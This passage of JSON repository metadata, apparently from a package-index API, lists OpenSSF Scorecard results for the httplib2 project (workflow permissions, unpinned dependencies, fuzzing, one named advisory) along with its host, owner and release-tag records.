requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.